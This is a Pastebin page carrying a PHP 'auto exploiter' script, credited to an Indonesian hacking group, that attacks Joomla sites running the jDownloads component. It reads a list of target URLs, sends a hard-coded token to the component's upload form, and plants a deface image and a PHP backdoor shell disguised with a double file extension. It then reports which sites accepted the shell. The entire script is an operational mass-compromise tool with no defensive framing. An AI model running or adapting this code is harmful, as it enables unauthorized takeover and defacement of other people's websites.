SHARE
TWEET

Mass Exploiter jDownloads

choirurrizal Dec 17th, 2017 (edited) 342 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3. # ShinChan - N45HT - N45HT.WEB.ID
  4. # fb.com/angelia.put - fb.com/ShinChan.admin - fb.com/N45HTOfficial - fb.com/groups/N45HTOfficial
  5. # shinchan0x1945@gmail.com
  6.  
  7. # your list.txt must a single directory with this exploiter #
  8.  
  9.  
  10. ##########################################################
  11. # Terimakasih kepada semua teman teman yang membantu membuat Exploiter ini
  12. # Exploiter ini mungkin tidak 100% work, soalnya bot njay
  13.  
  14. # Special thanks : PETR03X - Comod0x - Grav3 - FRU_403
  15.                    SCYTHE404_LOL - All Members N45HT
  16. ##########################################################
  17.  
  18. # note : jangan hapus copyright, hargai pembuat
  19.  
  20.  
  21.  
  22. # coded by ShinChan - N45HT | 15/12/2017
  23. */
  24. echo "
  25.  ___  _  _  __  _  _  __  _  _   __   _  _     _    _  ____  ___
  26. / __)( )( )(  )( \( )/ _)( )( ) (  ) ( \( )   ( \/\/ )(_  _)(  _)
  27. \__ \ )__(  )(  )  (( (_  )__(  /__\  )  (  ___\    /   )(   ) _)
  28. (___/(_)(_)(__)(_)\_)\__)(_)(_)(_)(_)(_)\_)(___)\/\/   (__) (_)  
  29.        jDownloads Auto Exploiter - coded by ShinChan
  30.  
  31.  Thanks to :  PETR03X - Mr.x0x - SCYTHE404_LOL - ./Mr.Blank007
  32.                        All Members N45HT
  33.  
  34.  
  35. ";
  36. echo "Input your target list: ";
  37. $list = trim(fgets(STDIN));
  38.  
  39. $zip = "sh.zip"; //File WinRAR, ekstensi harus zip/rar
  40. $gif = "sh.gif"; //image(jpg,png,gif) atau script deface(html.j,htm.j)
  41. $shell = "sh.php.php.j"; //shell backdoor(.php.php.j)
  42. $shells = str_replace("php.j","j",$shell);
  43. $path = "/images/jdownloads/screenshots/";
  44. $exploit = "/?option=com_jdownloads&Itemid=1&view=upload";
  45.  
  46. $open = fopen("$list","r");
  47. $size = filesize("$list");
  48. $read = fread($open,$size);
  49. $lists = explode("\r\n",$read);
  50.  
  51. $postgif = array(
  52.     "name" => "ShinChan",
  53.     "mail" => "shinchan0x1945@gmail.com",
  54.     "catlist" => "1",
  55.     "file_upload" => "@$zip",
  56.     "filetitle" => "hacked by ShinChan",
  57.     "description" => "<p>hacked by ShinChan</p>",
  58.     "2d1a8f3bd0b5cf542e9312d74fc9766f" => 1,
  59.     "send"=>1,
  60.     "senden" => "Send file",
  61.     "description" => "<p>hacked by ShinChan</p>",
  62.     "option"=>"com_jdownloads",
  63.     "view"=>"upload",
  64.     "pic_upload" => "@$gif"
  65. );
  66. $postshell = array(
  67.     "name" => "ShinChan",
  68.     "mail" => "shinchan0x1945@gmail.com",
  69.     "catlist" => "1",
  70.     "file_upload" => "@$zip",
  71.     "filetitle" => "hacked by ShinChan",
  72.     "description" => "<p>hacked by ShinChan</p>",
  73.     "2d1a8f3bd0b5cf542e9312d74fc9766f" => 1,
  74.     "send"=>1,
  75.     "senden" => "Send file",
  76.     "description" => "<p>hacked by ShinChan</p>",
  77.     "option"=>"com_jdownloads",
  78.     "view"=>"upload",
  79.     "pic_upload" => "@$shell"
  80. );
  81.  
  82. echo "\n";
  83.  
  84. foreach($lists as $target){
  85.     if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){
  86.         $targets = "http://$target";
  87.     }else{
  88.         $targets = $target;
  89.     }
  90.    
  91.     echo "Target => $targets\n";
  92.     echo "  [*] Checking Path : ";
  93.    
  94.     $chj = curl_init("$targets$exploit");
  95.     curl_setopt($chj, CURLOPT_FOLLOWLOCATION, 1);
  96.     curl_setopt($chj, CURLOPT_RETURNTRANSFER, 1);
  97.     curl_exec($chj);
  98.     $httpcodej = curl_getinfo($chj, CURLINFO_HTTP_CODE);
  99.     curl_close($chj);
  100.    
  101.     $ckg = curl_init("$targets$path$gif");
  102.     curl_setopt($ckg, CURLOPT_FOLLOWLOCATION, 1);
  103.     curl_setopt($ckg, CURLOPT_RETURNTRANSFER, 1);
  104.     curl_exec($ckg);
  105.     $httpcodeg = curl_getinfo($ckg, CURLINFO_HTTP_CODE);
  106.     curl_close($ckg);
  107.    
  108.     $cks = curl_init("$targets$path$shells");
  109.     curl_setopt($cks, CURLOPT_FOLLOWLOCATION, 1);
  110.     curl_setopt($cks, CURLOPT_RETURNTRANSFER, 1);
  111.     curl_exec($cks);
  112.     $httpcodes = curl_getinfo($cks, CURLINFO_HTTP_CODE);
  113.     curl_close($cks);
  114.    
  115.     if($httpcodej == 200){
  116.         echo "200 OK\n";
  117.         echo "  [*] Bypass Token : 2d1a8f3bd0b5cf542e9312d74fc9766f\n";
  118.         echo "  [*] Uploading Image : ";
  119.         $ch = curl_init("$targets$exploit");
  120.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  121.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  122.         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,3 );
  123.         curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
  124.         curl_setopt($ch, CURLOPT_POST, 1);
  125.         curl_setopt($ch, CURLOPT_POSTFIELDS, $postgif);
  126.         $data = curl_exec($ch);
  127.         curl_close($ch);
  128.         if($httpcodeg == 200 OR preg_match('/The file was successfully transferred to the server!/',$data) OR preg_match("/color=\"green\">/",$data)){
  129.             echo "OK $targets$path$gif\n";
  130.             echo "  [*] Uploading Shell : ";
  131.             $chs = curl_init("$targets$exploit");
  132.             curl_setopt($chs, CURLOPT_FOLLOWLOCATION, 1);
  133.             curl_setopt($chs, CURLOPT_RETURNTRANSFER, 1);
  134.             curl_setopt($chs, CURLOPT_CONNECTTIMEOUT,3 );
  135.             curl_setopt($chs, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
  136.             curl_setopt($chs, CURLOPT_POST, 1);
  137.             curl_setopt($chs, CURLOPT_POSTFIELDS, $postshell);
  138.             $datas = curl_exec($chs);
  139.             curl_close($chs);
  140.             if($httpcodeg == 200 OR preg_match('/The file was successfully transferred to the server!/',$datas) OR preg_match("/color=\"green\">/",$datas)){
  141.                 echo "OK $targets$path$shells\n\n";
  142.             }else{
  143.                 echo "Failed\n\n";
  144.             }
  145.         }else{
  146.             echo "Failed\n";
  147.             echo "  [*] Uploading Shell : ";
  148.             $chs = curl_init("$targets$exploit");
  149.             curl_setopt($chs, CURLOPT_FOLLOWLOCATION, 1);
  150.             curl_setopt($chs, CURLOPT_RETURNTRANSFER, 1);
  151.             curl_setopt($chs, CURLOPT_CONNECTTIMEOUT,3 );
  152.             curl_setopt($chs, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
  153.             curl_setopt($chs, CURLOPT_POST, 1);
  154.             curl_setopt($chs, CURLOPT_POSTFIELDS, $postshell);
  155.             $datas = curl_exec($chs);
  156.             curl_close($chs);
  157.             if($httpcodes == 200 OR preg_match('/The file was successfully transferred to the server!/',$datas) OR preg_match("/color=\"green\">/",$datas)){
  158.                 echo "OK $targets$path$shells\n\n";
  159.             }else{
  160.                 echo "Failed\n\n";
  161.             }
  162.         }
  163.     }else{
  164.         echo "Not Vulnerable\n\n";
  165.     }
  166. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top